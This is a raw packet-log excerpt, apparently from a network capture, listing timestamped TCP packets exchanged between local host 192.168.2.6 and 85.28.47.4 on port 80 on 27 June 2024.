                                                                Jun 27, 2024 05:58:11.704287052 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.704312086 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.704332113 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.704334021 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.704344034 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.704348087 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.704355955 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.704365015 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.704368114 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.704380989 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.704381943 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.704391956 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.704399109 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.704404116 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.704437971 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.704449892 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.704461098 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.704461098 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.704461098 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.704467058 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.704473019 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.704478025 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.704489946 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.704498053 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.704503059 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.704509974 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.704551935 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.705225945 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.705239058 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.705249071 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.705260992 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.705264091 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.705285072 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.705292940 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.705310106 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.705334902 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.786361933 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.786400080 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.786412954 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.786513090 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.786525965 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.786528111 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.786535978 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.786549091 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.786575079 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.786592960 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.786597967 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.786616087 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.786632061 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.786648035 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.786690950 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.786701918 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.786712885 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.786721945 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.786725044 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.786741972 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.786766052 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.786940098 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.786952972 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.786963940 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.786978006 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.786983013 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.786990881 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.787010908 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.787026882 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.787211895 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.787245989 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.787281036 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.787370920 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.787383080 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.787395000 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.787405968 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.787417889 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.787429094 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.787448883 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.787544966 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.787736893 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.787758112 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.787770033 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.787779093 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.787786007 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.787796974 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.787806034 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.787807941 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.787828922 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.787832975 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.787841082 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.787849903 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.787853003 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.787874937 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.787898064 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.788433075 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.788445950 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.788456917 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.788467884 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.788485050 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.788500071 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.788511992 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.788522959 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.788578987 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.788777113 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.788789034 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.788800001 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.788810968 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.788824081 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.788825035 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.788842916 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.788860083 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.788938999 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.788950920 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.788961887 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.788980961 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.788981915 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.788995981 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.789005995 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.789007902 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.789031029 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.789052963 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.789335966 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.789347887 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.789359093 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.789378881 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.789402008 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.789505005 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.789518118 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.789527893 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.789541006 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.789551973 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.789562941 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.789573908 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.789585114 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.789601088 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.789613962 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.789624929 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.789635897 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.789644957 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.789648056 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.789659977 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.789670944 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.789716005 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.790663004 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.790676117 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.790683985 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.790697098 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.790709019 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.790714979 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.790719986 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.790731907 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.790740967 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.790743113 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.790754080 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.790766001 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.790766001 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.790779114 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.790786982 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.790790081 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.790802002 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.790802956 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.790812969 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.790823936 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.790834904 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.790836096 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.790847063 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.790858030 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.790863037 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.790869951 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.790882111 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.790904045 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.791659117 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.791671038 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.791681051 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.791692019 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.791703939 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.791713953 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.791713953 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.791726112 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.791735888 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.791738033 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.791749001 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.791752100 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.791760921 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.791773081 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.791779041 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.791785002 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.791795969 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.791806936 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.791806936 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.791820049 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.791826963 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.791831970 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.791841984 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.791843891 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.791856050 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.791867971 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.791892052 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.792592049 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.792604923 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.792615891 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.792629004 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.792639971 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.792639971 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.792654037 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.792658091 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.792664051 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.792675972 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.792702913 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.873663902 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.873678923 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.873689890 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.873696089 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.873708010 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.873719931 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.873733044 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.873752117 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.873783112 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.873838902 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.873842955 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.873864889 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.873876095 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.873878956 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.873903990 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.873914957 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.873954058 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.873969078 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.873980999 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.874008894 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.874022007 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.874126911 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.874138117 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.874147892 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.874160051 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.874165058 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.874183893 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.874209881 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.874283075 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.874294043 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.874322891 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.874413013 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.874423981 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.874434948 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.874449968 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.874474049 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.874629974 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.874641895 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.874653101 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.874664068 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.874675035 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.874675989 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.874686956 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.874700069 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.874706984 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.874725103 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.874742985 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.874888897 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.874901056 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.874907017 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.874938011 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.875051022 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.875066996 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.875077963 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.875087023 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.875088930 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.875099897 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.875109911 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.875138044 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.875340939 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.875351906 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.875361919 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.875371933 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.875386000 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.875389099 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.875402927 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.875405073 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.875416994 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.875417948 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.875427961 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.875438929 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.875444889 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.875449896 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.875462055 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.875472069 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.875473976 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.875485897 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.875493050 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.875498056 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.875507116 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.875509977 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.875521898 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.875531912 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.875555992 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.876101017 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.876111984 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.876117945 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.876163960 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.876180887 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.876204014 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.876214981 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.876224995 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.876235008 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.876243114 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.876246929 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.876257896 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.876260996 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.876269102 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.876279116 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.876281023 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.876293898 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.876317978 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.876334906 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.876805067 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.876816988 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.876827955 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.876840115 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.876849890 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.876854897 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.876861095 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.876872063 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.876879930 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.876882076 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.876893997 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.876905918 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.876907110 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.876919985 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.876924992 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.876930952 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.876940012 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.876948118 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.876960039 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.876966953 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.876991034 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.877577066 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.877588034 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.877593994 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.877599955 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.877609968 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.877615929 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.877621889 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.877625942 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.877631903 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.877643108 CEST804971185.28.47.4192.168.2.6
